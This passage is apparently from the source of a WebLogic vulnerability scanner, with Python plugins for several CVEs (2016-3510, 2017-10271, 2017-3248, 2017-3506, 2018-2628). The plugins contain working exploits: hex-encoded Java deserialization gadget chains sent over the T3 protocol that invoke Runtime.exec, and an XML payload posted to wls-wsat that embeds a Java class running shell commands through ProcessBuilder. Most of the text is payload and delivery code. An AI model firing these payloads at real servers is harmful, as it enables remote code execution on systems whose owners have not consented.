726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078']
24 | VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer']
25 |
26 | logging.basicConfig(filename='Weblogic.log',
27 | format='%(asctime)s %(message)s',
28 | filemode="w", level=logging.INFO)
29 |
30 |
31 | @ManageProcessor.plugin_register('CVE20163510')
32 | class CVE20163510(object):
33 | def process(self,ip,port):
34 | self.run(ip,port,0)
35 |
36 | def t3handshake(self,sock,server_addr):
37 | sock.connect(server_addr)
38 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
39 | time.sleep(1)
40 | sock.recv(1024)
41 | def buildT3RequestObject(self,sock,port):
42 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
43 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
44 | data3 = '1a7727000d3234322e323134'
45 | data4 = '2e312e32353461863d1d0000000078'
46 | for d in [data1,data2,data3,data4]:
47 | sock.send(bytes.fromhex(d))
48 | time.sleep(2)
49 |
50 | def sendEvilObjData(self,sock,data):
51 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
52 | payload+=data
53 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
54 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
55 | sock.send(bytes.fromhex(payload))
56 | res = ''
57 | try:
58 | while True:
59 | res += sock.recv(4096).decode('utf-8','ignore')
60 | time.sleep(0.1)
61 | except Exception:
62 | pass
63 | return res
64 | def checkVul(self,res,index):
65 | p=re.findall(VER_SIG[index], res, re.S)
66 | if len(p)>0:
67 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
68 | print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
69 | print(Vcolors.OKGREEN+'[+]CVE-2016-3510 漏洞存在'+Vcolors.ENDC)
70 | else:
71 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
72 | print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)
73 |
74 | def run(self,ip,port,index):
75 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
76 | sock.settimeout(5)
77 | server_addr = (ip, port)
78 | self.t3handshake(sock,server_addr)
79 | self.buildT3RequestObject(sock,port)
80 | rs=self.sendEvilObjData(sock,PAYLOAD[index])
81 | self.checkVul(rs,index)
82 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2017-10271.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2017-10271.py
4 | @Time : 2019/07/06 01:39:25
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import requests
14 | import re
15 | import logging
16 |
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
21 | logging.basicConfig(filename='Weblogic.log',
22 | format='%(asctime)s %(message)s',
23 | filemode="w", level=logging.INFO)
24 |
25 | VUL='CVE-2017-10271'
26 | index=1
27 | headers = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml',}
28 | poc_str = '''
29 |
30 |
31 |
32 |
33 | 0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034
34 |
35 |
36 |
37 | com.supeream.exploits.XmlExp
38 |
39 |
40 |
41 | echo UjFhbmRyMG9wCg== | base64
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 | '''
64 |
65 |
66 | @ManageProcessor.plugin_register('CVE201710271')
67 | class CVE201710271(object):
68 | def process(self,ip,port):
69 | self.run(ip,port)
70 |
71 | def poc(self,url):
72 | if not url.startswith("http"):
73 | url = "http://" + url
74 | if "/" in url:
75 | url += '/wls-wsat/CoordinatorPortType'
76 | try:
77 | res = requests.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
78 | response = res.text
79 | #response = re.search(r"\.*\<\/faultstring\>", response).group(0)
80 | except Exception:
81 | response = ""
82 |
83 | #if 'java.lang.ProcessBuilder' in response or "0" in response:
84 | if 'VWpGaGJtUnlNRzl3Q2c9PQo=' in response:
85 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL))
86 | print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Vcolors.ENDC)
87 | print(Vcolors.OKGREEN+'[+]CVE-2017-10271 漏洞存在'+Vcolors.ENDC)
88 | else:
89 | logging.info('[-]Target weblogic not detected {}'.format(VUL))
90 | print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Vcolors.ENDC)
91 | def run(self,ip,port):
92 | url=ip+':'+str(port)
93 | self.poc(url=url)
94 |
95 |
96 |
97 |
98 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2017-3248.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2017-3248.py
4 | @Time : 2019/07/06 01:38:16
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import logging
14 | import socket
15 | import sys
16 | import time
17 | import re
18 |
19 | from ..platform import ManageProcessor
20 | from lib import *
21 |
22 | logging.basicConfig(filename='Weblogic.log',
23 | format='%(asctime)s %(message)s',
24 | filemode="w", level=logging.INFO)
25 |
26 | VUL=['CVE-2017-3248']
27 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078']
28 | VER_SIG=['\\$Proxy[0-9]+']
29 |
30 | @ManageProcessor.plugin_register('CVE20173248')
31 | class CVE20173248(object):
32 | def process(self,ip,port):
33 | self.run(ip,port,0)
34 |
35 | def t3handshake(self,sock,server_addr):
36 | sock.connect(server_addr)
37 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
38 | time.sleep(1)
39 | sock.recv(1024)
40 |
41 | def buildT3RequestObject(self,sock,port):
42 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
43 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
44 | data3 = '1a7727000d3234322e323134'
45 | data4 = '2e312e32353461863d1d0000000078'
46 | for d in [data1,data2,data3,data4]:
47 | sock.send(bytes.fromhex(d))
48 | time.sleep(2)
49 |
50 | def sendEvilObjData(self,sock,data):
51 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
52 | payload+=data
53 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
54 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
55 | sock.send(bytes.fromhex(payload))
56 | res = ''
57 | try:
58 | while True:
59 | res += sock.recv(4096).decode('utf-8','ignore')
60 | time.sleep(0.1)
61 | except Exception:
62 | pass
63 | return res
64 | def checkVul(self,res,index):
65 | p=re.findall(VER_SIG[index], res, re.S)
66 | if len(p)>0:
67 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
68 | print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
69 | print(Vcolors.OKGREEN+'[+]CVE-2017-3248 漏洞存在'+Vcolors.ENDC)
70 | else:
71 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
72 | print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)
73 |
74 | def run(self,ip,port,index):
75 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
76 | sock.settimeout(5)
77 | server_addr = (ip, port)
78 | self.t3handshake(sock,server_addr)
79 | self.buildT3RequestObject(sock,port)
80 | rs=self.sendEvilObjData(sock,PAYLOAD[index])
81 | self.checkVul(rs,index)
82 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2017-3506.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2017-3506.py
4 | @Time : 2019/07/06 01:38:51
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import sys
14 | import requests
15 | import re
16 | import logging
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
21 | logging.basicConfig(filename='Weblogic.log',
22 | format='%(asctime)s %(message)s',
23 | filemode="w", level=logging.INFO)
24 |
25 | VUL=['CVE-2017-3506']
26 | headers = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml'}
27 |
28 | poc_str = '''
29 |
30 |
31 |
32 |
33 |
47 |
48 |
49 |
50 |
51 |
52 | '''
53 |
54 |
55 | @ManageProcessor.plugin_register('CVE20173506')
56 | class CVE20173506(object):
57 | def process(self,ip,port):
58 | self.run(ip,port,0)
59 |
60 | def poc(self,url,index):
61 | if not url.startswith("http"):
62 | url = "http://" + url
63 | if "/" in url:
64 | url += '/wls-wsat/CoordinatorPortType'
65 |
66 | try:
67 | response = requests.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
68 | response = response.text
69 | response = re.search(r"\.*\<\/faultstring\>", response).group(0)
70 | except Exception:
71 | response = ""
72 |
73 | if 'java.lang.ProcessBuilder' in response or "0" in response:
74 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
75 | print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
76 | print(Vcolors.OKGREEN+'[+]CVE-2017-3506 漏洞存在'+Vcolors.ENDC)
77 | else:
78 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
79 | print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)
80 |
81 |
82 | def run(self,rip,rport,index):
83 | url=rip+':'+str(rport)
84 | self.poc(url=url,index=index)
85 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2018-2628.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2018-2628.py
4 | @Time : 2019/07/06 01:39:54
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import socket
13 | import sys
14 | import time
15 | import re
16 | import logging
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
21 | logging.basicConfig(filename='Weblogic.log',
22 | format='%(asctime)s %(message)s',
23 | filemode="w", level=logging.INFO)
24 |
25 |
26 | VUL=['CVE-2018-2628']
